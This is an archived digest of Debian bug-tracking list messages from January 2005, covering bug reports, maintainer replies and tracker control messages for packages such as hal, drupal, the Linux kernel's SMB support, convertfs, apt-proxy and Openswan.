ii  libdb3   3.2.9-20Berkeley v3 Database Libraries [ru
ii  libesd0  0.2.35-2Enlightened Sound Daemon - Shared 
ii  libfinance-quote-perl1.08-1  Perl module for retrieving stock q
ii  libfreetype6 2.1.7-2.3   FreeType 2 font engine, shared lib
ii  libgal23 0.24-1.4G App Libs (run time library)
ii  libgdk-pixbuf-gnome2 0.22.0-7The GNOME1 Canvas pixbuf library
ii  libgdk-pixbuf2   0.22.0-7The GdkPixBuf image library, gtk+ 
ii  libghttp11.0.9-15original GNOME HTTP client library
ii  libglade-gnome0  1:0.17-3Library to load .glade files at ru
ii  libglade01:0.17-3Library to load .glade files at ru
ii  libglib1.2   1.2.10-9The GLib library of C routines
ii  libgnome32   1.4.2-19The GNOME libraries
ii  libgnomeprint15  0.37-5  The GNOME Print architecture - run
ii  libgnomesupport0 1.4.2-19The GNOME libraries (Support libra
ii  libgnomeui32 1.4.2-19The GNOME libraries (User Interfac
ii  libgtk1.21.2.10-17   The GIMP Toolkit set of widgets fo
ii  libgtkhtml20 1.0.4-6.2   HTML rendering/editing library - r
ii  libguile-ltdl-1  1.6.7-1 Guile's patched version of libtool
ii  libguppi16   0.40.3-11   GNOME graph and plot component
ii  libgwrapguile1   1.3.4-12g-wrap: Tool for exporting C libra
ii  libice6  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  libltdl3 1.5.6-4 A system independent dlopen wrappe
ii  liboaf0  0.6.10-3The GNOME Object Activation Framew
ii  libofx1  1:0.7.0-7   library to support Open Financial 
ii  liborbit00.5.17-9Libraries for ORBit - a CORBA ORB
ii  libpopt0 1.7-5   lib for parsing cmdline parameters
ii  libqthreads-12   1.6.7-1 QuickThreads library for Guile
ii  libsm6   4.3.0.dfsg.1-10 X Window System Session Management
ii  libstdc++5   1:3.3.5-6   The GNU Standard C++ Library v3
ii  libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxext6 4.3.0.dfsg.1-10 X Window System miscellaneous exte
ii  libxi6   4.3.0.dfsg.1-10 X Window System Input extension li
ii  libxml1  1:1.8.17-10 GNOME XML library
ii  libzvt2  1.4.2-19The GNOME zvt (zterm) widget
ii  oaf  0.6.10-3The GNOME Object Activation Framew
ii  slib 3a1-4.2 Portable Scheme library
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-4   compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292622: upstream

2005-01-28 Thread Allard Hoeve

tags upstream
forwarded 292622 http://rt.cpan.org/NoAuth/Bugs.html?Dist=PDF-Report

thanks

Allard



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292644: hal: Hald can not be started (neither on boot nor from the command line)

2005-01-28 Thread Sjoerd Simons
severity 292644 normal
retitle 292644 Show a message about not being able to start with a 2.4 kernel
thanks,

On Fri, Jan 28, 2005 at 02:57:31PM +0100, Victor Martinez Moll wrote:
> -- System Information:
> Debian Release: 3.1
>   APT prefers testing
>   APT policy: (500, 'testing')
> Architecture: i386 (i686)
> Kernel: Linux 2.4.27-1-386

Hal needs a 2.6 kernel to work. But it would be nice if the init script
actually mentioned that on start :)

  Sjoerd
--
In order to discover who you are, first learn who everybody else is;
you're what's left.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292239: manpage looks not distributeable, as license not adhered

2005-01-28 Thread Martin Waitz
hoi :)

On Tue, Jan 25, 2005 at 09:49:02PM +0100, Bernhard R. Link wrote:
> The following manpages say they are only distributeable under
> the GFDL, but do not include the license text required by this
> license:

I will upload a fixed version soon.

-- 
Martin Waitz


signature.asc
Description: Digital signature


Processed: Re: Bug#292644: hal: Hald can not be started (neither on boot nor from the command line)

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 292644 normal
Bug#292644: hal: Hald can not be started (neither on boot nor from the command 
line)
Severity set to `normal'.

> retitle 292644 Show a message about not being able to start with a 2.4 kernel
Bug#292644: hal: Hald can not be started (neither on boot nor from the command 
line)
Changed Bug title.

> thanks,
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: your mail

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> close 281698
Bug#281698: request-tracker3.2: does not work with apache2
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to Ronald Vyhmeister <[EMAIL 
PROTECTED]>

> tag 291164 wontfix
Bug#291164: request-tracker3: mod_rewrite should be enabled when installed on 
Apache 2
There were no tags set.
Tags added: wontfix

> severity 291164 wishlist
Bug#291164: request-tracker3: mod_rewrite should be enabled when installed on 
Apache 2
Severity set to `wishlist'.

> close 291411
Bug#291411: request-tracker3: Very outdated
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to John Goerzen <[EMAIL PROTECTED]>

> quit
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reopening 292014, tagging 292014

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.8.10
> reopen 292014
Bug#292014: xmms-jackasyn: missing endianness check produces garbage output
Bug reopened, originator not changed.

>  # still waiting for 0.1-2 in sarge
> tags 292014 sarge
Bug#292014: xmms-jackasyn: missing endianness check produces garbage output
Tags were: patch
Tags added: sarge

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292647: drupal: upgrade from 4.4.x doesn't backup db, destroys db in process

2005-01-28 Thread Unit 3
Package: drupal
Version: 4.5.2-1
Severity: grave
Justification: causes non-serious data loss


The upgrade script from 4.4.x that this package attempts to run 
apparently doesn't think to run "createlang plpgsql drupal" like it 
should before doing the upgrade. This causes the upgrade to fail 
horribly on systems where that hasn't been done. In addition, on my 
system, the "backup" in /var/lib/drupal just contained 4 commented lines 
saying something like "this is a backup from the upgrade process", so I 
now have no way to recover my data.

Normally I file better bug reports than this, but I'm a little agitated 
at the loss of ~4 years of personal content, and because my main 
workstation overheated and died while I was in the process of trying to 
recover from this. :(


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-1-k7
Locale: LANG=en_CA, LC_CTYPE=en_CA (charmap=ISO-8859-1)

Versions of packages drupal depends on:
ii  apache2-mpm-prefork [apache2] 2.0.52-3   Traditional model for Apache2
ii  debconf   1.4.30.11  Debian configuration management sy
ii  exim4-daemon-heavy [mail-tran 4.34-10Exim (v4) with extended features, 
ii  makepasswd1.10-2 Generate and encrypt passwords
ii  mysql-client [virtual-mysql-c 4.0.23-3   mysql database client binaries
ii  php4-cli  4:4.3.10-2 command-line interpreter for the p
ii  php4-mysql4:4.3.10-2 MySQL module for php4
ii  php4-pgsql3:4.3.9-1  PostgreSQL module for php4
ii  postgresql-client 7.4.6-6front-end programs for PostgreSQL
ii  wwwconfig-common  0.0.42 Debian web auto configuration

-- debconf information:
  drupal/createuser_failed:
* drupal/db_auto_update: true
  drupal/dropdb_failed:
  drupal/upgradedb_impossible:
* drupal/dbgeneration: false
* drupal/dbtype: PostgreSQL
* drupal/database_doremove: false
  drupal/upgradedb_failed:
* drupal/dbuser: drupal
  drupal/conffile_failed:
* drupal/remove_backups: false
  drupal/createdb_failed:
* drupal/dbserver: localhost
* drupal/webserver: apache2
* drupal/dbname: drupal
  drupal/dbadmin: root
  drupal/initdb_failed:


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292651: kernel-image-2.6.8-2-k7: timeout in zero-length accesses to samba shares, dmesg: "smb_trans2: invalid data, [..]"

2005-01-28 Thread Thiemo Nagel
Package: kernel-image-2.6.8-2-k7
Version: 2.6.8-12
Severity: grave
Justification: causes non-serious data loss


Zero-length accesses to Samba shares return errors after 30s timeout, while
the requested action seems to happen:

[EMAIL PROTECTED]:/mnt/thiemo$ l test
-rw-r--r--  1 thiemo users 0 Jan 28 15:30 test
[EMAIL PROTECTED]:/mnt/thiemo$ chmod a-r test
chmod: changing permissions of `test': Input/output error
[EMAIL PROTECTED]:/mnt/thiemo$ l test
--w---  1 thiemo users 0 Jan 28 15:30 test
[EMAIL PROTECTED]:/mnt/thiemo$ touch test
touch: setting times of `test': Input/output error
[EMAIL PROTECTED]:/mnt/thiemo$ l test
--w---  1 thiemo users 0 Jan 28 16:01 test

The kernel log is as follows:

smb_trans2: invalid data, disp=0, cnt=0, tot=0, ofs=0
smb_add_request: request [c2354ec0, mid=180] timed out!

What makes this a grave severity is that many editors seem to choke on
the errors and cannot save to smb-mounted shares.  This is true at least
for OpenOffice.

Luckily this problem seems to be well-understood:
citing Mike Lee:
http://lists.samba.org/archive/samba/2004-December/097411.html
"It seems that some CIFS code got trampled on during a smb kernel patch.
I believe this will be fixed in the 2.6.10 kernel (pretty soon I hope).
For now, you can add the following entry to your smb.conf file:
"unix extensions = no"

citing Chuck Ebbert:
http://www.ussg.iu.edu/hypermail/linux/kernel/0411.2/2326.html
"The SMB patch in 2.6.9-ac10 is broken. When a reply is received and it
contains no data (only parms), the data_offset is zero. Since no data
will be copied, zero offset is perfectly valid.
[..]
With the original patch very bad things happened, like trying to save
files from a text editor truncated them to 0 bytes, followed by editor
freezing for many seconds then asking for a new name to save the file
as.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages kernel-image-2.6.8-2-k7 depends on:
ii  coreutils [fileutils] 5.2.1-2The GNU core utilities
ii  initrd-tools  0.1.77 tools to create initrd image for p
ii  module-init-tools 3.1-rel-2  tools for managing Linux kernel mo

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292458: CVE Id

2005-01-28 Thread Martin Schulze
Rene Mayrhofer wrote:
> Hi Joey,
> 
> On Friday 28 January 2005 07:28, Martin Schulze wrote:
> > Stack-based buffer overflow in the get_internal_addresses function in
> > the pluto application for Openswan 1.x before 1.0.9, and Openswan 2.x
> > before 2.3.0, when compiled XAUTH and PAM enabled, allows remote
> > authenticated attackers to execute arbitrary code.
> I still think that the bug is present in 2.3.0 too. At least I applied the 
> patch also to this release - which has the same (flawed) definition of the 
> src variable.

I'll forward this.

Regards,

Joey

-- 
Testing? What's that? If it compiles, it is good, if it boots up, it is perfect.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292644: hal: Hald can not be started (neither on boot nor from the command line)

2005-01-28 Thread Victor Martinez Moll
Package: hal
Version: 0.4.2-5
Severity: grave
Justification: renders package unusable


Hald does not start.
Wen run from the command line: /usr/sbin/hald --daemon=no --verbose=yes
the output I get is:
09:48:52.271 [I] hald.c:394: hal 0.4.2
09:48:52.285 [I] hald.c:398: Will not daemonize
*** [DIE] linux/osspec.c:osspec_init():215 : Couldn't get mount path for
sysfs

I have also tried to start hald by hand using the order:

/etc/dbus-1/event.d/20hal start

with the same result: hald does not start.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.27-1-386
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages hal depends on:
ii  adduser   3.59   Add and remove users and groups
ii  dbus-10.23-1 simple interprocess messaging syst
ii  dbus-glib-1   0.23-1 simple interprocess messaging syst
ii  libc6 2.3.2.ds1-20   GNU C Library: Shared libraries an
ii  libcap1   1:1.10-14  support for getting/setting POSIX.
ii  libexpat1 1.95.8-1   XML parsing C library - runtime li
ii  libglib2.0-0  2.6.1-2The GLib library of C routines
ii  libhal-storage0   0.4.2-5Hardware Abstraction Layer - share
ii  libhal0   0.4.2-5Hardware Abstraction Layer - share
ii  libpopt0  1.7-5  lib for parsing cmdline parameters
ii  pciutils  1:2.1.11-15Linux PCI Utilities
ii  udev  0.050-3/dev/ management daemon
ii  usbutils  0.11+cvs20041108-1 USB console utilities

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#288829: marked as done (apt-proxy - opens database files as root)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 05:47:13 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#288829: fixed in apt-proxy 1.9.25
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 5 Jan 2005 21:28:49 +
>From [EMAIL PROTECTED] Wed Jan 05 13:28:49 2005
Return-path: <[EMAIL PROTECTED]>
Received: from wavehammer.waldi.eu.org [82.139.196.55] (postfix)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CmIi0-00055L-00; Wed, 05 Jan 2005 13:28:49 -0800
Received: by wavehammer.waldi.eu.org (Postfix, from userid 1000)
id 727463C025; Wed,  5 Jan 2005 22:28:44 +0100 (CET)
Date: Wed, 5 Jan 2005 22:28:44 +0100
From: Bastian Blank <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: apt-proxy - opens database files as root
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="W/nzBZO5zC0uMSeA"
Content-Disposition: inline
User-Agent: Mutt/1.5.6+20040907i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 


--W/nzBZO5zC0uMSeA
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: apt-proxy
Version: 1.9.24
Severity: grave

I deleted the database as it was out of sync and the new is owned by
root.

Bastian

--=20
I'm a soldier, not a diplomat.  I can only tell the truth.
-- Kirk, "Errand of Mercy", stardate 3198.9

--W/nzBZO5zC0uMSeA
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)

iEYEARECAAYFAkHcXAwACgkQnw66O/MvCNFBhQCfVMWZD5f/9yTIuhhhSuq9OvdM
5IYAoKAC04SNchNYgBFzrVZyKuZ2WCfH
=HRVz
-END PGP SIGNATURE-

--W/nzBZO5zC0uMSeA--

---
Received: (at 288829-close) by bugs.debian.org; 28 Jan 2005 10:53:25 +
>From [EMAIL PROTECTED] Fri Jan 28 02:53:24 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuTki-0001It-00; Fri, 28 Jan 2005 02:53:24 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1CuTej-0007OZ-00; Fri, 28 Jan 2005 05:47:13 -0500
From: Chris Halls <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#288829: fixed in apt-proxy 1.9.25
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 28 Jan 2005 05:47:13 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Source: apt-proxy
Source-Version: 1.9.25

We believe that the bug you reported is fixed in the latest version of
apt-proxy, which is due to be installed in the Debian FTP archive:

apt-proxy_1.9.25.dsc
  to pool/main/a/apt-proxy/apt-proxy_1.9.25.dsc
apt-proxy_1.9.25.tar.gz
  to pool/main/a/apt-proxy/apt-proxy_1.9.25.tar.gz
apt-proxy_1.9.25_all.deb
  to pool/main/a/apt-proxy/apt-proxy_1.9.25_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Chris Halls <[EMAIL PROTECTED]> (supplier of updated apt-proxy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri, 28 Jan 2005 10:26:49 +
Source: apt-proxy
Binary: apt-proxy
Architecture: source all
Version: 1.9.25
Distribution: unstable
Urgency: low
Maintainer: Otavio Salvador <[EMAIL PROTECTED]>
Changed-By: Chris Halls <[EMAIL PROTECTED]>
Description: 
 apt-proxy  - Debian archive p

Bug#238246: marked as done (convertfs: doesn't work correctly with filenames with spaces in them)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 07:17:08 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#238246: fixed in convertfs 20050113-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 16 Mar 2004 04:15:38 +
>From [EMAIL PROTECTED] Mon Mar 15 20:15:38 2004
Return-path: <[EMAIL PROTECTED]>
Received: from sccrmhc12.comcast.net [204.127.202.56] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1B35zO-NU-00; Mon, 15 Mar 2004 20:15:38 -0800
Received: from bminton.internal.lambda.mu 
(pcp02496233pcs.anaprd01.md.comcast.net[68.48.126.51])
  by comcast.net (sccrmhc12) with ESMTP
  id <200403160415050120077ciee>; Tue, 16 Mar 2004 04:15:05 +
Received: from bminton by bminton.internal.lambda.mu with local (Exim 3.35 #1 
(Debian))
id 1B35yn-0002c0-00; Mon, 15 Mar 2004 23:15:01 -0500
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Brian Minton <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: convertfs: doesn't work correctly with filenames with spaces in them
X-Mailer: reportbug 2.48
Date: Mon, 15 Mar 2004 23:15:00 -0500
Message-Id: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_12 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-7.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2004_03_12
X-Spam-Level: 

Package: convertfs
Version: 20020318-1
Severity: important

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have a directory with a bunch of directories with spaces in the name.
The names have the format of dates:

$ ls -1 /mnt/scratch/
Sun Dec 14 09:44:29 EST 2003
Sun Dec 14 09:45:28 EST 2003
Sun Dec 14 09:51:22 EST 2003
Sun Dec 14 09:52:08 EST 2003
Sun Dec 21 06:00:01 EST 2003
[...] 

etc.

so when I try to run the convertfs script, it fails:

# umount /mnt/scratch
# convertfs  /dev/vg1/lv_scratch reiserfs xfs
== Creating clone of `reiserfs' filesystem that's on `/dev/vg1/lv_scratch'. ==
= Creating destination `xfs' filesystem. =
meta-data=/dev/loop7 isize=256agcount=16, agsize=212480 blks
 =   sectsz=512  
data =   bsize=4096   blocks=3399680, imaxpct=25
 =   sunit=0  swidth=0 blks, unwritten=1
naming   =version 2  bsize=4096  
log  =internal log   bsize=4096   blocks=2560, version=1
 =   sectsz=512   sunit=0 blks
realtime =none   extsz=65536  blocks=0, rtextents=0
== Copying files ==
mv: cannot stat `/tmp/convertfs/fs1root/Sun': No such file or directory

obviously it is trying to use the name Sun instead of the full name of the 
directory.

the offending line is line 205:

for file in `ls -1A $fs1root`; do

Also, note that this hardcodes temporary file names.  It should
use mktemp or some such, in order to avoid a collision with an existing
file.  There is no code in the script to check if the fsimage, fsindex
or fssuper files exist.  (Note however that the devclone program may do
some checking, I don't know).


- -- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.3
Locale: LANG=C, LC_CTYPE=C

Versions of packages convertfs depends on:
ii  libc6   2.3.2.ds1-11 GNU C Library: Shared libraries an

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAVn9DcieIIFcDdHIRAucRAJ0elbx7a5wEePbdryxqVtcxPBRvzgCgglBv
HbS2HpbCIPwNYyxDsCKUnEI=
=CVIc
-END PGP SIGNATURE-

---
Received: (at 238246-close) by bugs.debian.org; 28 Jan 2005 12:25:06 +
>From [EMAIL PROTECTED] Fri Jan 28 04:25:06 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuVBS-0007Dm-00; Fri, 28 Jan 2005 04:25:06 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1CuV3k-0001LQ-00; Fri, 28 Jan 2005 07:17:08 -0500
From: Guus Sliepen <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#238246: fixed in convertfs 20050113-1
Message-Id: <[EMAIL 

Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images

2005-01-28 Thread Matthias Urlichs
Hi,

Don Armstrong:
> [I'm hijacking this bug, because this is (in my mind anyway) a
> different problem.]
> 
No problem -- as long as it gets fixed.

> On second notice, the templates have been modified to change this to
> /gallery-icons. Doing this is not a good idea, as it will break all
> existing installs of Apache::Gallery, and furthermore, the source
> hasn't been modified to decline gallery-icons appropriately.
> 
True. :-/

-- 
Matthias Urlichs   |   {M:U} IT Design @ m-u-it.de   |  [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Bug#292458: CVE Id

2005-01-28 Thread Rene Mayrhofer
Hi Joey,

On Friday 28 January 2005 07:28, Martin Schulze wrote:
> Stack-based buffer overflow in the get_internal_addresses function in
> the pluto application for Openswan 1.x before 1.0.9, and Openswan 2.x
> before 2.3.0, when compiled XAUTH and PAM enabled, allows remote
> authenticated attackers to execute arbitrary code.
I still think that the bug is present in 2.3.0 too. At least I applied the 
patch also to this release - which has the same (flawed) definition of the 
src variable.

> Please mention this id in the changelog (could be done with the next
> upload if you've already uploaded the fixed package.
Ok, I will do that with the next upload - both testing and unstable versions 
got uploaded yesterday to fix the security issue.

best regards,
Rene


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#261824: Ultra Enterprise 1

2005-01-28 Thread Paul Timmins
I can confirm the same bug on the Ultra Enterprise 1:
un Ultra 1 SBus (UltraSPARC 167MHz), No Keyboard
OpenBoot 3.25, 256 MB memory installed, Serial #8007118.
Ethernet address 8:0:20:7a:2d:ce, Host ID: 807a2dce.



Boot device: disk  File and args:
Fast Data Access MMU Miss
ok boot cdrom
Boot device: /sbus/[EMAIL PROTECTED],840/[EMAIL PROTECTED],880/[EMAIL 
PROTECTED],0:f  File and
args:
SILO Version 1.4.8
Fast Data Access MMU Miss
ok .registers
Normal  Alternate   MMU   Vector
0: 0000
1:  f005d45c1 fffde6c0  7f1
2:  f000 f00324bc f000 f000
3:  fffe fffe6  1400318
4:1306 4000
5:  f0062f64 fffe72f0f   10
6:  fffefe18   441600 fffee
7:  fffeefa8   4e   68 f0054878
%PC  f000909c %nPC f00090a0
%TBA f000 %CCR 0 XCC:nzvc   ICC:nzvc
ok
ok ctrace
PC: f000909c
Last leaf: call f0008068from f000d784
 0 w  %o0-%o5: (f0014988 0 f006b580 396358 3b0008 2 )

jmpl  f005d45cfrom 3825ec
 1 w  %o0-%o5: (3a1410 0 f002cadc 397180 3a14d0 2 )

call 38248cfrom 382b6c
 2 w  %o0-%o5: (33 0 f002cadc 397180 3a4f70 4 )

call 38248cfrom 3873a4
 3 w  %o0-%o5: (397760 0 3a4f70 1000 3a4928 1 )

call 3874f8from 386128
 4 w  %o0-%o5: (3a3000 3a4529 3a4928 20 1 3 )

call 381bc8from 3802c8
 5 w  %o0-%o5: (398770 f005d45c 596080 f000  33f80036 )

call 10958from 10800
 6 w  %o0-%o5: (0 0 0 0 f005d45c 0 )

-Paul Timmins

-- 
Paul Timmins <[EMAIL PROTECTED]>
Timmins Technologies, LLC



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292569: kdelibs-data: conflicts with openoffic.org

2005-01-28 Thread Matías Costa
El Jueves 27 Enero 2005 23:25, Robert Waldner escribió:
> Package: kdelibs-data
> Version: 4:3.1.5-1
> Severity: serious
> Justification: unkown
>
>
> Whilst installing amarok, I encountered the following error:
>
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: error processing
> /var/cache/apt/archives/kdelibs-data_4%3a3.3.2-1_all.deb (--unpack):
>  trying to overwrite
>  `/usr/share/mimelnk/application/vnd.sun.xml.calc.desktop', which is
>  also in package openoffice.org
>
> Installed is openoffice.org 1.0.3-2, on a mixed stable/testing/unstable
> system.

This is solved in newer openoffice.org packages. Just upgrade.



Bug#292622: libpdf-report-perl: Does not work with recent libpdf-api2-perl packages

2005-01-28 Thread Allard Hoeve
Package: libpdf-report-perl
Version: 1.22-0.1
Severity: grave
Justification: renders package unusable


Gunnar,

I am just reporting this here for archiving purposes.

Recent uploads of the new PDF::API2 packages to Debian 
(starting 2005-01-06) have caused PDF::Report to stop working
properly. The cause of this are some changes to PDF::API2's interface, 
I presume, although I haven't investigated the matter much.

Software that worked with the 0.3r77 releases stopped working with the
new 0.40 releases.

We should:

1) Add a Conflicts: line
2) Report this upstream

Anyways, this package shouldn't find it's way into Sarge without fixing.

Regards,

Allard

PS: Yes, there is a new upstream version. It doesn't fix this issue.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.10-ac10-byte
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages libpdf-report-perl depends on:
ii  libpdf-api2-perl  0.40.83-2  Provides the functions for creatin
ii  libtext-roman-perl3.3-3  A module for managing integer and 
ii  perl  5.8.4-5Larry Wall's Practical Extraction 

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292629: libapache-mod-aspseek: GPLed module for a GPL-incompatible webserver (Apache)

2005-01-28 Thread Steve Langasek
Package: libapache-mod-aspseek
Version: 1.2.10-1.1
Severity: serious

Reviewing the license of the libapache-mod-aspseek package to verify whether
its license was compatible with the license of libmysqlclient12, I found
that this package's copyright file says it is licensed under the GNU GPL.

Unfortunately, while this is compatible with the MySQL license (which is
also GPL), it is not compatible with the Apache license:

  http://www.fsf.org/licenses/license-list.html

As a result, it is my understanding that we do not have a license to
distribute libapache-mod-aspseek in binary form, because we cannot distribute
Apache under terms matching those of the GPL.  Please ask your upstream for a
license exemption that allows Debian to distribute mod_aspseek in binary
form so that this package can be included in the sarge release.

-- 
Steve Langasek
postmodern programmer


signature.asc
Description: Digital signature


Bug#289182: marked as forwarded (kino endianness issues on powerpc)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 10:57:01 +0100
with message-id <[EMAIL PROTECTED]>
has caused the Debian Bug report #289182,
regarding kino endianness issues on powerpc
to be marked as having been forwarded to the upstream software
author(s) [EMAIL PROTECTED]

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---
Received: (at 289182-forwarded) by bugs.debian.org; 28 Jan 2005 09:57:12 +
